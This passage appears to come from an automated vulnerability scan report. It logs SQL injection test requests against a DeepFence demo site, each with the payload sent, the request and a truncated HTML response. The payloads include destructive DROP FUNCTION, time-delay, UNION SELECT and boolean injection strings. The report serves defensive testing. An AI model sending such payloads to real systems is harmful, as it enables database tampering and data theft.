href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1235Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION \nxcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1236\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \")) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1237\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1238\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1239\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1240\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1241\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1242\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7506=9091 AND ('5913=\n5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1243\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1244\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1245\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1246\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1247\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1248\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 